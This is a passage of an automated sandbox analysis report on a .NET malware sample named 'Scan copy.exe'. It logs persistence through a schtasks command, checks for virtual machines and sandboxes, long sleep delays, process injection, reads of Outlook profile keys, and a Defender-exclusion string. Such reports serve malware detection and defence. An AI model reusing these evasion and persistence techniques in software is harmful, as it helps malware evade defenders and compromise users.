                      Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\Scan copy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Scan copy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                      Source: Scan copy.exeReversingLabs: Detection: 17%
                      Source: C:\Users\user\Desktop\Scan copy.exeFile read: C:\Users\user\Desktop\Scan copy.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Scan copy.exe 'C:\Users\user\Desktop\Scan copy.exe'
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\emmrGOU' /XML 'C:\Users\user\AppData\Local\Temp\tmp3F10.tmp'
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Users\user\Desktop\Scan copy.exe C:\Users\user\Desktop\Scan copy.exe
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\emmrGOU' /XML 'C:\Users\user\AppData\Local\Temp\tmp3F10.tmp'
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Users\user\Desktop\Scan copy.exe C:\Users\user\Desktop\Scan copy.exe
                      Source: C:\Users\user\Desktop\Scan copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Scan copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Scan copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Scan copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\fXDNGqRoBT\src\obj\x86\Debug\PermissionSetEntryFieldId.pdb source: Scan copy.exe
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\fXDNGqRoBT\src\obj\x86\Debug\PermissionSetEntryFieldId.pdb8 source: Scan copy.exe

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: Scan copy.exe, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: emmrGOU.exe.0.dr, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.Scan copy.exe.870000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.Scan copy.exe.870000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.2.Scan copy.exe.c70000.1.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.0.Scan copy.exe.c70000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.0.Scan copy.exe.c70000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_072761E8 push esp; iretd
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_072711C2 push ebx; iretd
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_072711C9 push ebx; iretd
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_0153BB1A pushfd ; iretd
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_0153B3A8 pushfd ; retf
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.86391692068
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.86391692068
                      Source: C:\Users\user\Desktop\Scan copy.exeFile created: C:\Users\user\AppData\Roaming\emmrGOU.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\emmrGOU' /XML 'C:\Users\user\AppData\Local\Temp\tmp3F10.tmp'
                      Source: C:\Users\user\Desktop\Scan copy.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 6048, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Scan copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Scan copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Scan copy.exeWindow / User API: threadDelayed 2677
                      Source: C:\Users\user\Desktop\Scan copy.exeWindow / User API: threadDelayed 7171
                      Source: C:\Users\user\Desktop\Scan copy.exe TID: 6076Thread sleep time: -102260s >= -30000s
                      Source: C:\Users\user\Desktop\Scan copy.exe TID: 3840Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Scan copy.exe TID: 6080Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Scan copy.exe TID: 5716Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Users\user\Desktop\Scan copy.exe TID: 2128Thread sleep count: 2677 > 30
                      Source: C:\Users\user\Desktop\Scan copy.exe TID: 2128Thread sleep count: 7171 > 30
                      Source: C:\Users\user\Desktop\Scan copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Scan copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Scan copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 102260
                      Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 922337203685477
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: Scan copy.exe, 00000007.00000002.471464886.00000000013CB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_015388B0 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\Scan copy.exeMemory written: C:\Users\user\Desktop\Scan copy.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\emmrGOU' /XML 'C:\Users\user\AppData\Local\Temp\tmp3F10.tmp'
                      Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Users\user\Desktop\Scan copy.exe C:\Users\user\Desktop\Scan copy.exe
                      Source: Scan copy.exe, 00000007.00000002.472515118.0000000001AA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: Scan copy.exe, 00000007.00000002.472515118.0000000001AA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Scan copy.exe, 00000007.00000002.472515118.0000000001AA0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: Scan copy.exe, 00000007.00000002.472515118.0000000001AA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Users\user\Desktop\Scan copy.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
